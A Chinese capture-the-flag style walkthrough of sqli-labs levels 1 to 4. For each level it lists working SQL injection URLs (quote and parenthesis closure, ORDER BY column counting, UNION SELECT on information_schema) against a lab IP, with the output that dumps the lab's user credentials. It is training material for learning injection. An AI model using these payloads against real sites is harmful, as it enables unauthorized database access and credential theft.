sqli-labs靶场通关(Less1-4)
typora-root-url: images
Less-1
检查注入点
键入正确的url
http://192.168.12.132/Less-1/?id=1 # Your Login name:Dumb # Your Password:Dumb
尝试注入类型
http://192.168.12.132/Less-1/?id=1' # You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 # 可以确定为是字符型注入,通过单引号闭合
尝试注入
确定列数
http://192.168.12.132/Less-1/?id=1' order by 3 --+ # 正常回显 http://192.168.12.132/Less-1/?id=1' order by 4 --+ # Unknown column '4' in 'order clause' # 可以知道列数为3
确定哪些字段可以回显,并利用
http://192.168.12.132/Less-1/?id=-1' union select 1,2,3 --+ # Your Login name:2 # Your Password:3http://192.168.12.132/Less-1/?id=-1' union select 1,database(),3 --+ # Your Login name:security # Your Password:3 # 数据库名:security
利用数据库名查找有哪些表
http://192.168.12.132/Less-1/?id=-1' union select 1,database(),GROUP_CONCAT(table_name) from information_schema.tables where table_schema='security' --+ # Your Login name:security # Your Password:emails,referers,uagents,users # 数据库security中有表emails,referers,uagents,users
利用表名查找有哪些字段
http://192.168.12.132/Less-1/?id=-1' union select 1,database(),GROUP_CONCAT(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+ # Your Login name:security # Your Password:id,username,password
列出user表所有的用户信息
http://192.168.12.132/Less-1/?id=-1' union select 1,2,group_concat(username,'-->',password) from users--+ # Your Login name:2 # Your Password:Dumb-->Dumb,Angelina-->I-kill-you,Dummy-->p@ssword,secure-->crappy,stupid-->stupidity,superman-->genious,batman-->mob!le,admin-->admin,admin1-->admin1,admin2-->admin2,admin3-->admin3,dhakkan-->dumbo,admin4-->admin4 # 成功
Less-2
检查注入点
键入正确的url
http://192.168.12.132/Less-2/?id=1 # Your Login name:Dumb # Your Password:Dumb
尝试注入类型
http://192.168.12.132/Less-2/?id=1' # You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 # 可以确定为是数字型注入
尝试注入
确定列数
http://192.168.12.132/Less-2/?id=1 order by 3 --+ # 正常回显 http://192.168.12.132/Less-2/?id=1 order by 4 --+ # Unknown column '4' in 'order clause' # 可以知道列数为3
确定哪些字段可以回显,并利用
http://192.168.12.132/Less-2/?id=-1 union select 1,2,3 --+ # Your Login name:2 # Your Password:3http://192.168.12.132/Less-2/?id=-1 union select 1,database(),3 --+ # Your Login name:security # Your Password:3 # 数据库名:security
利用数据库名查找有哪些表
http://192.168.12.132/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'--+ # Your Login name:security # Your Password:emails,referers,uagents,users # 数据库security中有表emails,referers,uagents,users
利用表名查找有哪些字段
http://192.168.12.132/Less-2/?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+ # Your Login name:security # Your Password:id,username,password
列出user表所有的用户信息
http://192.168.12.132/Less-2/?id=-1 union select 1,database(),group_concat(username,'-->',password) from users --+ # Your Login name:2 # Your Password:Dumb-->Dumb,Angelina-->I-kill-you,Dummy-->p@ssword,secure-->crappy,stupid-->stupidity,superman-->genious,batman-->mob!le,admin-->admin,admin1-->admin1,admin2-->admin2,admin3-->admin3,dhakkan-->dumbo,admin4-->admin4 # 成功
Less-3
检查注入点
键入正确的url
http://192.168.12.132/Less-3/?id=1 # Your Login name:Dumb # Your Password:Dumb
尝试注入类型
http://192.168.12.132/Less-3/?id=1' # You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1 # 可以确定为是字符型注入,通过单引号闭合
尝试注入
确定列数
http://192.168.12.132/Less-3/?id=1' order by 3 --+ # You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3 -- ') LIMIT 0,1' at line 1 # 根据报错信息,猜测sql格式可能为:select * from users where id in ('1'),调整注入,闭合括号http://192.168.12.132/Less-3/?id=1') order by 3 --+ # 正常回显 http://192.168.12.132/Less-3/?id=1') order by 4 --+ # Unknown column '4' in 'order clause' # 可以知道列数为3
确定哪些字段可以回显,并利用
http://192.168.12.132/Less-3/?id=-1') union select 1,2,3 --+ # Your Login name:2 # Your Password:3http://192.168.12.132/Less-3/?id=-1') union select 1,database(),3 --+ # Your Login name:security # Your Password:3 # 数据库名:security
利用数据库名查找有哪些表
http://192.168.12.132/Less-3/?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+ # Your Login name:security # Your Password:emails,referers,uagents,users # 数据库security中有表emails,referers,uagents,users
利用表名查找有哪些字段
http://192.168.12.132/Less-3/?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+ # Your Login name:security # Your Password:id,username,password
列出user表所有的用户信息
http://192.168.12.132/Less-3/?id=-1') union select 1,database(),group_concat(username,'-->',password) from users--+ # Your Login name:security # Your Password:Dumb-->Dumb,Angelina-->I-kill-you,Dummy-->p@ssword,secure-->crappy,stupid-->stupidity,superman-->genious,batman-->mob!le,admin-->admin,admin1-->admin1,admin2-->admin2,admin3-->admin3,dhakkan-->dumbo,admin4-->admin4 # 成功
Less-4
检查注入点
键入正确的url
http://192.168.12.132/Less-4/?id=1 # Your Login name:Dumb # Your Password:Dumb
尝试注入类型
http://192.168.12.132/Less-4/?id=1' # Your Login name:Dumb # Your Password:Dumbhttp://192.168.12.132/Less-4/?id=1" # You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1 # 根据报错信息,调整注入http://192.168.12.132/Less-4/?id=1" and 1=1 --+ # You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1http://192.168.12.132/Less-4/?id=1") and 1=1 --+ # Your Login name:Dumb # Your Password:Dumb# 可以确定为是字符型注入,通过")闭合
尝试注入
确定列数
http://192.168.12.132/Less-4/?id=1") order by 3 --+ # 正常回显 http://192.168.12.132/Less-4/?id=1") order by 4 --+ # Unknown column '4' in 'order clause' # 可以知道列数为3
确定哪些字段可以回显,并利用
http://192.168.12.132/Less-4/?id=-1") union select 1,2,3 --+ # Your Login name:2 # Your Password:3http://192.168.12.132/Less-4/?id=-1") union select 1,database(),3 --+ # Your Login name:security # Your Password:3 # 数据库名:security
利用数据库名查找有哪些表
http://192.168.12.132/Less-4/?id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+ # Your Login name:security # Your Password:emails,referers,uagents,users # 数据库security中有表emails,referers,uagents,users
利用表名查找有哪些字段
http://192.168.12.132/Less-4/?id=-1") union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+ # Your Login name:security # Your Password:id,username,password
列出user表所有的用户信息
http://192.168.12.132/Less-4/?id=-1") union select 1,database(),group_concat(username,'-->',password) from users --+ # Your Login name:security # Your Password:Dumb-->Dumb,Angelina-->I-kill-you,Dummy-->p@ssword,secure-->crappy,stupid-->stupidity,superman-->genious,batman-->mob!le,admin-->admin,admin1-->admin1,admin2-->admin2,admin3-->admin3,dhakkan-->dumbo,admin4-->admin4 # 成功
sqli-labs靶场通关(Less1-4)相关推荐
- sqli——labs初学者通关详
目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi Labs Less-1 联合注入+报错注入
第一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解,原理+步骤+实战案例 第一步.判断注入点 地址栏输入:?id=1' and 1 -- a,正常显示 ...
- SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- billu_b0x靶场通关
billu靶场通关 靶机ip:192.168.112.134 信息收集 端口开放 80 目录扫描 images目录存在目录遍历 test.php(任意文件下载) add.php(文件上传) index ...
- 攻防系列——pikachu靶场通关练习
目录 一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破 二.Cr ...
- Pikachu靶场通关记录(详细)
Pikachu靶场通关记录 0x01 靶场介绍 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么 ...
- SQLi LABS Less-8 布尔盲注
「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...
最新文章
- 【数据结构】判断一个单链表中各结点的值是否有序
- oracle 判断是否错误_Oracle中的并行系列(二):你设置的并行真的生效了吗?...
- 编程语言的排名取决于应用场景和主要公司的需求
- Python 数据分析包:pandas 基础
- *17.解释一下最小生成树
- FreeRTOS学习及移植笔记之二:在IAR和STM32F103VET上移植FreeRTOS
- 工作流实战_07_flowable 流程定义查看流程图和xml
- Bailian2754 八皇后【回溯】
- Spring 相关jar包下载及其地址(官方下载地址 )
- adodb.recordset.open方法的参数
- windows server 2012 --安装远程桌面服务后无法远程的问题
- mac+ffmpeg+php,mac折腾安装ffmpeg小记
- Atitit.软件GUI按钮与仪表盘(01)--js区-----js格式化的使用
- 基于Python实现socket远程木马
- 《王家视频教程图书馆》
- 【案例】星环科技×某能源企业:数据中台实践
- cloopen(cloopen limited)
- iol植入手术过程_完美!浙二眼科中心完成中国首例连续视程IOL植入术 - 眼科专业讨论版 -丁香园论坛...
- 计算机毕业设计 SpringBoot+Vue作业帮课程管理系统 作业帮信息管理系统 作业帮试题管理系统
- Java程序监控工具